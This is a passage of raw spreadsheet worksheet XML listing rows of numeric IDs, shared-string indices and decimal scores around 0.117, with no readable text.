        <v>1.0</v>
      </c>
      <c r="E26271" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26271" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="26272" ht="15.75" customHeight="1">
      <c r="A26272" s="1">
        <v>27969.0</v>
      </c>
      <c r="B26272" s="2">
        <v>2.3962469E7</v>
      </c>
      <c r="C26272" s="2" t="s">
        <v>25262</v>
      </c>
      <c r="D26272" s="2">
        <v>1.0</v>
      </c>
      <c r="E26272" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26272" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="26273" ht="15.75" customHeight="1">
      <c r="A26273" s="1">
        <v>34221.0</v>
      </c>
      <c r="B26273" s="2">
        <v>4.5152855E7</v>
      </c>
      <c r="C26273" s="2" t="s">
        <v>25263</v>
      </c>
      <c r="D26273" s="2">
        <v>1.0</v>
      </c>
      <c r="E26273" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26273" s="2">
        <v>0.1181818181818182</v>
      </c>
    </row>
    <row r="26274" ht="15.75" customHeight="1">
      <c r="A26274" s="1">
        <v>27821.0</v>
      </c>
      <c r="B26274" s="2">
        <v>2.3365037E7</v>
      </c>
      <c r="C26274" s="2" t="s">
        <v>25264</v>
      </c>
      <c r="D26274" s="2">
        <v>1.0</v>
      </c>
      <c r="E26274" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26274" s="2">
        <v>0.1181818181818181</v>
      </c>
    </row>
    <row r="26275" ht="15.75" customHeight="1">
      <c r="A26275" s="1">
        <v>3300.0</v>
      </c>
      <c r="B26275" s="2">
        <v>3.7559668E7</v>
      </c>
      <c r="C26275" s="2" t="s">
        <v>25265</v>
      </c>
      <c r="D26275" s="2">
        <v>1.0</v>
      </c>
      <c r="E26275" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26275" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="26276" ht="15.75" customHeight="1">
      <c r="A26276" s="1">
        <v>26252.0</v>
      </c>
      <c r="B26276" s="2">
        <v>1.6338945E7</v>
      </c>
      <c r="C26276" s="2" t="s">
        <v>25199</v>
      </c>
      <c r="D26276" s="2">
        <v>1.0</v>
      </c>
      <c r="E26276" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26276" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="26277" ht="15.75" customHeight="1">
      <c r="A26277" s="1">
        <v>33583.0</v>
      </c>
      <c r="B26277" s="2">
        <v>8308444.0</v>
      </c>
      <c r="C26277" s="2" t="s">
        <v>25266</v>
      </c>
      <c r="D26277" s="2">
        <v>1.0</v>
      </c>
      <c r="E26277" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26277" s="2">
        <v>0.1180555555555556</v>
      </c>
    </row>
    <row r="26278" ht="15.75" customHeight="1">
      <c r="A26278" s="1">
        <v>2514.0</v>
      </c>
      <c r="B26278" s="2">
        <v>3.4001642E7</v>
      </c>
      <c r="C26278" s="2" t="s">
        <v>25267</v>
      </c>
      <c r="D26278" s="2">
        <v>1.0</v>
      </c>
      <c r="E26278" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26278" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="26279" ht="15.75" customHeight="1">
      <c r="A26279" s="1">
        <v>9456.0</v>
      </c>
      <c r="B26279" s="2">
        <v>5.5844044E7</v>
      </c>
      <c r="C26279" s="2" t="s">
        <v>25268</v>
      </c>
      <c r="D26279" s="2">
        <v>1.0</v>
      </c>
      <c r="E26279" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26279" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="26280" ht="15.75" customHeight="1">
      <c r="A26280" s="1">
        <v>12775.0</v>
      </c>
      <c r="B26280" s="2">
        <v>3.1283507E7</v>
      </c>
      <c r="C26280" s="2" t="s">
        <v>25269</v>
      </c>
      <c r="D26280" s="2">
        <v>1.0</v>
      </c>
      <c r="E26280" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26280" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="26281" ht="15.75" customHeight="1">
      <c r="A26281" s="1">
        <v>14893.0</v>
      </c>
      <c r="B26281" s="2">
        <v>4.1133024E7</v>
      </c>
      <c r="C26281" s="2" t="s">
        <v>25270</v>
      </c>
      <c r="D26281" s="2">
        <v>1.0</v>
      </c>
      <c r="E26281" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26281" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="26282" ht="15.75" customHeight="1">
      <c r="A26282" s="1">
        <v>25237.0</v>
      </c>
      <c r="B26282" s="2">
        <v>1.3379106E7</v>
      </c>
      <c r="C26282" s="2" t="s">
        <v>25271</v>
      </c>
      <c r="D26282" s="2">
        <v>1.0</v>
      </c>
      <c r="E26282" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26282" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="26283" ht="15.75" customHeight="1">
      <c r="A26283" s="1">
        <v>28415.0</v>
      </c>
      <c r="B26283" s="2">
        <v>2.6359515E7</v>
      </c>
      <c r="C26283" s="2" t="s">
        <v>25272</v>
      </c>
      <c r="D26283" s="2">
        <v>1.0</v>
      </c>
      <c r="E26283" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26283" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="26284" ht="15.75" customHeight="1">
      <c r="A26284" s="1">
        <v>31624.0</v>
      </c>
      <c r="B26284" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C26284" s="2" t="s">
        <v>25137</v>
      </c>
      <c r="D26284" s="2">
        <v>1.0</v>
      </c>
      <c r="E26284" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26284" s="2">
        <v>0.1179337231968811</v>
      </c>
    </row>
    <row r="26285" ht="15.75" customHeight="1">
      <c r="A26285" s="1">
        <v>10276.0</v>
      </c>
      <c r="B26285" s="2">
        <v>5.7624632E7</v>
      </c>
      <c r="C26285" s="2" t="s">
        <v>25273</v>
      </c>
      <c r="D26285" s="2">
        <v>1.0</v>
      </c>
      <c r="E26285" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26285" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="26286" ht="15.75" customHeight="1">
      <c r="A26286" s="1">
        <v>24020.0</v>
      </c>
      <c r="B26286" s="2">
        <v>9349302.0</v>
      </c>
      <c r="C26286" s="2" t="s">
        <v>25274</v>
      </c>
      <c r="D26286" s="2">
        <v>1.0</v>
      </c>
      <c r="E26286" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26286" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="26287" ht="15.75" customHeight="1">
      <c r="A26287" s="1">
        <v>27683.0</v>
      </c>
      <c r="B26287" s="2">
        <v>2.2972405E7</v>
      </c>
      <c r="C26287" s="2" t="s">
        <v>25275</v>
      </c>
      <c r="D26287" s="2">
        <v>1.0</v>
      </c>
      <c r="E26287" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26287" s="2">
        <v>0.117816091954023</v>
      </c>
    </row>
    <row r="26288" ht="15.75" customHeight="1">
      <c r="A26288" s="1">
        <v>2318.0</v>
      </c>
      <c r="B26288" s="2">
        <v>3.286669E7</v>
      </c>
      <c r="C26288" s="2" t="s">
        <v>25276</v>
      </c>
      <c r="D26288" s="2">
        <v>1.0</v>
      </c>
      <c r="E26288" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26288" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="26289" ht="15.75" customHeight="1">
      <c r="A26289" s="1">
        <v>5540.0</v>
      </c>
      <c r="B26289" s="2">
        <v>4.59248E7</v>
      </c>
      <c r="C26289" s="2" t="s">
        <v>25277</v>
      </c>
      <c r="D26289" s="2">
        <v>1.0</v>
      </c>
      <c r="E26289" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26289" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="26290" ht="15.75" customHeight="1">
      <c r="A26290" s="1">
        <v>7797.0</v>
      </c>
      <c r="B26290" s="2">
        <v>5.220815E7</v>
      </c>
      <c r="C26290" s="2" t="s">
        <v>25278</v>
      </c>
      <c r="D26290" s="2">
        <v>1.0</v>
      </c>
      <c r="E26290" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26290" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="26291" ht="15.75" customHeight="1">
      <c r="A26291" s="1">
        <v>31199.0</v>
      </c>
      <c r="B26291" s="2">
        <v>4921456.0</v>
      </c>
      <c r="C26291" s="2" t="s">
        <v>25279</v>
      </c>
      <c r="D26291" s="2">
        <v>1.0</v>
      </c>
      <c r="E26291" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26291" s="2">
        <v>0.1177024482109228</v>
      </c>
    </row>
    <row r="26292" ht="15.75" customHeight="1">
      <c r="A26292" s="1">
        <v>17055.0</v>
      </c>
      <c r="B26292" s="2">
        <v>4.8539018E7</v>
      </c>
      <c r="C26292" s="2" t="s">
        <v>25280</v>
      </c>
      <c r="D26292" s="2">
        <v>1.0</v>
      </c>
      <c r="E26292" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26292" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="26293" ht="15.75" customHeight="1">
      <c r="A26293" s="1">
        <v>25883.0</v>
      </c>
      <c r="B26293" s="2">
        <v>1.4972945E7</v>
      </c>
      <c r="C26293" s="2" t="s">
        <v>25219</v>
      </c>
      <c r="D26293" s="2">
        <v>1.0</v>
      </c>
      <c r="E26293" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26293" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="26294" ht="15.75" customHeight="1">
      <c r="A26294" s="1">
        <v>28222.0</v>
      </c>
      <c r="B26294" s="2">
        <v>2.507606E7</v>
      </c>
      <c r="C26294" s="2" t="s">
        <v>25281</v>
      </c>
      <c r="D26294" s="2">
        <v>1.0</v>
      </c>
      <c r="E26294" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26294" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="26295" ht="15.75" customHeight="1">
      <c r="A26295" s="1">
        <v>32693.0</v>
      </c>
      <c r="B26295" s="2">
        <v>5953811.0</v>
      </c>
      <c r="C26295" s="2" t="s">
        <v>25282</v>
      </c>
      <c r="D26295" s="2">
        <v>1.0</v>
      </c>
      <c r="E26295" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26295" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="26296" ht="15.75" customHeight="1">
      <c r="A26296" s="1">
        <v>422.0</v>
      </c>
      <c r="B26296" s="2">
        <v>1.6850133E7</v>
      </c>
      <c r="C26296" s="2" t="s">
        <v>25283</v>
      </c>
      <c r="D26296" s="2">
        <v>1.0</v>
      </c>
      <c r="E26296" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26296" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26297" ht="15.75" customHeight="1">
      <c r="A26297" s="1">
        <v>1243.0</v>
      </c>
      <c r="B26297" s="2">
        <v>2.5096587E7</v>
      </c>
      <c r="C26297" s="5" t="s">
        <v>25284</v>
      </c>
      <c r="D26297" s="2">
        <v>1.0</v>
      </c>
      <c r="E26297" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26297" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26298" ht="15.75" customHeight="1">
      <c r="A26298" s="1">
        <v>1752.0</v>
      </c>
      <c r="B26298" s="2">
        <v>2.8873372E7</v>
      </c>
      <c r="C26298" s="2" t="s">
        <v>25285</v>
      </c>
      <c r="D26298" s="2">
        <v>1.0</v>
      </c>
      <c r="E26298" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26298" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26299" ht="15.75" customHeight="1">
      <c r="A26299" s="1">
        <v>2327.0</v>
      </c>
      <c r="B26299" s="2">
        <v>3.2936022E7</v>
      </c>
      <c r="C26299" s="2" t="s">
        <v>25286</v>
      </c>
      <c r="D26299" s="2">
        <v>1.0</v>
      </c>
      <c r="E26299" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26299" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26300" ht="15.75" customHeight="1">
      <c r="A26300" s="1">
        <v>2412.0</v>
      </c>
      <c r="B26300" s="2">
        <v>3.3483188E7</v>
      </c>
      <c r="C26300" s="2" t="s">
        <v>25287</v>
      </c>
      <c r="D26300" s="2">
        <v>1.0</v>
      </c>
      <c r="E26300" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26300" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26301" ht="15.75" customHeight="1">
      <c r="A26301" s="1">
        <v>9078.0</v>
      </c>
      <c r="B26301" s="2">
        <v>5.5122354E7</v>
      </c>
      <c r="C26301" s="2" t="s">
        <v>25288</v>
      </c>
      <c r="D26301" s="2">
        <v>1.0</v>
      </c>
      <c r="E26301" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26301" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26302" ht="15.75" customHeight="1">
      <c r="A26302" s="1">
        <v>18573.0</v>
      </c>
      <c r="B26302" s="2">
        <v>5.3242888E7</v>
      </c>
      <c r="C26302" s="2" t="s">
        <v>25289</v>
      </c>
      <c r="D26302" s="2">
        <v>1.0</v>
      </c>
      <c r="E26302" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26302" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26303" ht="15.75" customHeight="1">
      <c r="A26303" s="1">
        <v>23338.0</v>
      </c>
      <c r="B26303" s="2">
        <v>5.4729354E7</v>
      </c>
      <c r="C26303" s="2" t="s">
        <v>25290</v>
      </c>
      <c r="D26303" s="2">
        <v>1.0</v>
      </c>
      <c r="E26303" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26303" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26304" ht="15.75" customHeight="1">
      <c r="A26304" s="1">
        <v>23578.0</v>
      </c>
      <c r="B26304" s="2">
        <v>6253472.0</v>
      </c>
      <c r="C26304" s="2" t="s">
        <v>25291</v>
      </c>
      <c r="D26304" s="2">
        <v>1.0</v>
      </c>
      <c r="E26304" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26304" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26305" ht="15.75" customHeight="1">
      <c r="A26305" s="1">
        <v>24764.0</v>
      </c>
      <c r="B26305" s="2">
        <v>1.1836647E7</v>
      </c>
      <c r="C26305" s="2" t="s">
        <v>25292</v>
      </c>
      <c r="D26305" s="2">
        <v>1.0</v>
      </c>
      <c r="E26305" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26305" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26306" ht="15.75" customHeight="1">
      <c r="A26306" s="1">
        <v>25040.0</v>
      </c>
      <c r="B26306" s="2">
        <v>1.2845577E7</v>
      </c>
      <c r="C26306" s="2" t="s">
        <v>25293</v>
      </c>
      <c r="D26306" s="2">
        <v>1.0</v>
      </c>
      <c r="E26306" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26306" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26307" ht="15.75" customHeight="1">
      <c r="A26307" s="1">
        <v>25372.0</v>
      </c>
      <c r="B26307" s="2">
        <v>1.3611545E7</v>
      </c>
      <c r="C26307" s="2" t="s">
        <v>25294</v>
      </c>
      <c r="D26307" s="2">
        <v>1.0</v>
      </c>
      <c r="E26307" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26307" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26308" ht="15.75" customHeight="1">
      <c r="A26308" s="1">
        <v>25421.0</v>
      </c>
      <c r="B26308" s="2">
        <v>1.3797436E7</v>
      </c>
      <c r="C26308" s="2" t="s">
        <v>25295</v>
      </c>
      <c r="D26308" s="2">
        <v>1.0</v>
      </c>
      <c r="E26308" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26308" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26309" ht="15.75" customHeight="1">
      <c r="A26309" s="1">
        <v>25748.0</v>
      </c>
      <c r="B26309" s="2">
        <v>1.4600289E7</v>
      </c>
      <c r="C26309" s="2" t="s">
        <v>25296</v>
      </c>
      <c r="D26309" s="2">
        <v>1.0</v>
      </c>
      <c r="E26309" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26309" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26310" ht="15.75" customHeight="1">
      <c r="A26310" s="1">
        <v>27024.0</v>
      </c>
      <c r="B26310" s="2">
        <v>2.0036703E7</v>
      </c>
      <c r="C26310" s="2" t="s">
        <v>25297</v>
      </c>
      <c r="D26310" s="2">
        <v>1.0</v>
      </c>
      <c r="E26310" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26310" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26311" ht="15.75" customHeight="1">
      <c r="A26311" s="1">
        <v>28947.0</v>
      </c>
      <c r="B26311" s="2">
        <v>2.9693783E7</v>
      </c>
      <c r="C26311" s="2" t="s">
        <v>25298</v>
      </c>
      <c r="D26311" s="2">
        <v>1.0</v>
      </c>
      <c r="E26311" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26311" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26312" ht="15.75" customHeight="1">
      <c r="A26312" s="1">
        <v>29521.0</v>
      </c>
      <c r="B26312" s="2">
        <v>3.2766527E7</v>
      </c>
      <c r="C26312" s="2" t="s">
        <v>25299</v>
      </c>
      <c r="D26312" s="2">
        <v>1.0</v>
      </c>
      <c r="E26312" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26312" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26313" ht="15.75" customHeight="1">
      <c r="A26313" s="1">
        <v>30578.0</v>
      </c>
      <c r="B26313" s="2">
        <v>4112371.0</v>
      </c>
      <c r="C26313" s="2" t="s">
        <v>25300</v>
      </c>
      <c r="D26313" s="2">
        <v>1.0</v>
      </c>
      <c r="E26313" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26313" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="26314" ht="15.75" customHeight="1">
      <c r="A26314" s="1">
        <v>6687.0</v>
      </c>
      <c r="B26314" s="2">
        <v>4.9179821E7</v>
      </c>
      <c r="C26314" s="2" t="s">
        <v>25301</v>
      </c>
      <c r="D26314" s="2">
        <v>1.0</v>
      </c>
      <c r="E26314" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26314" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="26315" ht="15.75" customHeight="1">
      <c r="A26315" s="1">
        <v>32848.0</v>
      </c>
      <c r="B26315" s="2">
        <v>6253471.0</v>
      </c>
      <c r="C26315" s="2" t="s">
        <v>25302</v>
      </c>
      <c r="D26315" s="2">
        <v>1.0</v>
      </c>
      <c r="E26315" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26315" s="2">
        <v>0.117283950617284</v>
      </c>
    </row>
    <row r="26316" ht="15.75" customHeight="1">
      <c r="A26316" s="1">
        <v>4868.0</v>
      </c>
      <c r="B26316" s="2">
        <v>4.3826149E7</v>
      </c>
      <c r="C26316" s="2" t="s">
        <v>25303</v>
      </c>
      <c r="D26316" s="2">
        <v>1.0</v>
      </c>
      <c r="E26316" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26316" s="2">
        <v>0.1172086720867209</v>
      </c>
    </row>
    <row r="26317" ht="15.75" customHeight="1">
      <c r="A26317" s="1">
        <v>16155.0</v>
      </c>
      <c r="B26317" s="2">
        <v>4.5577183E7</v>
      </c>
      <c r="C26317" s="2" t="s">
        <v>25304</v>
      </c>
      <c r="D26317" s="2">
        <v>1.0</v>
      </c>
      <c r="E26317" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26317" s="2">
        <v>0.1171875</v>
      </c>
    </row>
    <row r="26318" ht="15.75" customHeight="1">
      <c r="A26318" s="1">
        <v>27531.0</v>
      </c>
      <c r="B26318" s="2">
        <v>2.2199264E7</v>
      </c>
      <c r="C26318" s="2" t="s">
        <v>25305</v>
      </c>
      <c r="D26318" s="2">
        <v>1.0</v>
      </c>
      <c r="E26318" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26318" s="2">
        <v>0.1170940170940171</v>
      </c>
    </row>
    <row r="26319" ht="15.75" customHeight="1">
      <c r="A26319" s="1">
        <v>13774.0</v>
      </c>
      <c r="B26319" s="2">
        <v>3.6530067E7</v>
      </c>
      <c r="C26319" s="2" t="s">
        <v>25306</v>
      </c>
      <c r="D26319" s="2">
        <v>1.0</v>
      </c>
      <c r="E26319" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26319" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="26320" ht="15.75" customHeight="1">
      <c r="A26320" s="1">
        <v>16913.0</v>
      </c>
      <c r="B26320" s="2">
        <v>4.812912E7</v>
      </c>
      <c r="C26320" s="2" t="s">
        <v>25307</v>
      </c>
      <c r="D26320" s="2">
        <v>1.0</v>
      </c>
      <c r="E26320" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26320" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="26321" ht="15.75" customHeight="1">
      <c r="A26321" s="1">
        <v>17580.0</v>
      </c>
      <c r="B26321" s="2">
        <v>5.0266539E7</v>
      </c>
      <c r="C26321" s="2" t="s">
        <v>25308</v>
      </c>
      <c r="D26321" s="2">
        <v>1.0</v>
      </c>
      <c r="E26321" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26321" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="26322" ht="15.75" customHeight="1">
      <c r="A26322" s="1">
        <v>19937.0</v>
      </c>
      <c r="B26322" s="2">
        <v>5.7445996E7</v>
      </c>
      <c r="C26322" s="2" t="s">
        <v>25309</v>
      </c>
      <c r="D26322" s="2">
        <v>1.0</v>
      </c>
      <c r="E26322" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26322" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="26323" ht="15.75" customHeight="1">
      <c r="A26323" s="1">
        <v>21258.0</v>
      </c>
      <c r="B26323" s="2">
        <v>2.0040909E7</v>
      </c>
      <c r="C26323" s="2" t="s">
        <v>25310</v>
      </c>
      <c r="D26323" s="2">
        <v>1.0</v>
      </c>
      <c r="E26323" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26323" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="26324" ht="15.75" customHeight="1">
      <c r="A26324" s="1">
        <v>23576.0</v>
      </c>
      <c r="B26324" s="2">
        <v>6242245.0</v>
      </c>
      <c r="C26324" s="2" t="s">
        <v>25311</v>
      </c>
      <c r="D26324" s="2">
        <v>1.0</v>
      </c>
      <c r="E26324" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26324" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="26325" ht="15.75" customHeight="1">
      <c r="A26325" s="1">
        <v>28847.0</v>
      </c>
      <c r="B26325" s="2">
        <v>2.8959004E7</v>
      </c>
      <c r="C26325" s="2" t="s">
        <v>25312</v>
      </c>
      <c r="D26325" s="2">
        <v>1.0</v>
      </c>
      <c r="E26325" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26325" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="26326" ht="15.75" customHeight="1">
      <c r="A26326" s="1">
        <v>33004.0</v>
      </c>
      <c r="B26326" s="2">
        <v>6629816.0</v>
      </c>
      <c r="C26326" s="2" t="s">
        <v>25313</v>
      </c>
      <c r="D26326" s="2">
        <v>1.0</v>
      </c>
      <c r="E26326" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26326" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="26327" ht="15.75" customHeight="1">
      <c r="A26327" s="1">
        <v>12843.0</v>
      </c>
      <c r="B26327" s="2">
        <v>3.1762864E7</v>
      </c>
      <c r="C26327" s="2" t="s">
        <v>25314</v>
      </c>
      <c r="D26327" s="2">
        <v>1.0</v>
      </c>
      <c r="E26327" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26327" s="2">
        <v>0.1163522012578617</v>
      </c>
    </row>
    <row r="26328" ht="15.75" customHeight="1">
      <c r="A26328" s="1">
        <v>799.0</v>
      </c>
      <c r="B26328" s="2">
        <v>2.1246154E7</v>
      </c>
      <c r="C26328" s="2" t="s">
        <v>25315</v>
      </c>
      <c r="D26328" s="2">
        <v>1.0</v>
      </c>
      <c r="E26328" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26328" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26329" ht="15.75" customHeight="1">
      <c r="A26329" s="1">
        <v>846.0</v>
      </c>
      <c r="B26329" s="2">
        <v>2.169036E7</v>
      </c>
      <c r="C26329" s="2" t="s">
        <v>25316</v>
      </c>
      <c r="D26329" s="2">
        <v>1.0</v>
      </c>
      <c r="E26329" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26329" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26330" ht="15.75" customHeight="1">
      <c r="A26330" s="1">
        <v>1219.0</v>
      </c>
      <c r="B26330" s="2">
        <v>2487911.0</v>
      </c>
      <c r="C26330" s="2" t="s">
        <v>25317</v>
      </c>
      <c r="D26330" s="2">
        <v>1.0</v>
      </c>
      <c r="E26330" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26330" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26331" ht="15.75" customHeight="1">
      <c r="A26331" s="1">
        <v>2153.0</v>
      </c>
      <c r="B26331" s="2">
        <v>3.1640922E7</v>
      </c>
      <c r="C26331" s="2" t="s">
        <v>25318</v>
      </c>
      <c r="D26331" s="2">
        <v>1.0</v>
      </c>
      <c r="E26331" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26331" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26332" ht="15.75" customHeight="1">
      <c r="A26332" s="1">
        <v>2425.0</v>
      </c>
      <c r="B26332" s="2">
        <v>3.358146E7</v>
      </c>
      <c r="C26332" s="2" t="s">
        <v>25319</v>
      </c>
      <c r="D26332" s="2">
        <v>1.0</v>
      </c>
      <c r="E26332" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26332" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26333" ht="15.75" customHeight="1">
      <c r="A26333" s="1">
        <v>2461.0</v>
      </c>
      <c r="B26333" s="2">
        <v>3.3753846E7</v>
      </c>
      <c r="C26333" s="2" t="s">
        <v>25320</v>
      </c>
      <c r="D26333" s="2">
        <v>1.0</v>
      </c>
      <c r="E26333" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26333" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26334" ht="15.75" customHeight="1">
      <c r="A26334" s="1">
        <v>2681.0</v>
      </c>
      <c r="B26334" s="2">
        <v>3.4798984E7</v>
      </c>
      <c r="C26334" s="2" t="s">
        <v>25321</v>
      </c>
      <c r="D26334" s="2">
        <v>1.0</v>
      </c>
      <c r="E26334" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26334" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26335" ht="15.75" customHeight="1">
      <c r="A26335" s="1">
        <v>2937.0</v>
      </c>
      <c r="B26335" s="2">
        <v>3.5950592E7</v>
      </c>
      <c r="C26335" s="2" t="s">
        <v>25322</v>
      </c>
      <c r="D26335" s="2">
        <v>1.0</v>
      </c>
      <c r="E26335" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26335" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26336" ht="15.75" customHeight="1">
      <c r="A26336" s="1">
        <v>2955.0</v>
      </c>
      <c r="B26336" s="2">
        <v>3.601227E7</v>
      </c>
      <c r="C26336" s="2" t="s">
        <v>25323</v>
      </c>
      <c r="D26336" s="2">
        <v>1.0</v>
      </c>
      <c r="E26336" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26336" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26337" ht="15.75" customHeight="1">
      <c r="A26337" s="1">
        <v>4212.0</v>
      </c>
      <c r="B26337" s="2">
        <v>4.1698803E7</v>
      </c>
      <c r="C26337" s="2" t="s">
        <v>25324</v>
      </c>
      <c r="D26337" s="2">
        <v>1.0</v>
      </c>
      <c r="E26337" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26337" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26338" ht="15.75" customHeight="1">
      <c r="A26338" s="1">
        <v>6041.0</v>
      </c>
      <c r="B26338" s="2">
        <v>4.758827E7</v>
      </c>
      <c r="C26338" s="2" t="s">
        <v>25325</v>
      </c>
      <c r="D26338" s="2">
        <v>1.0</v>
      </c>
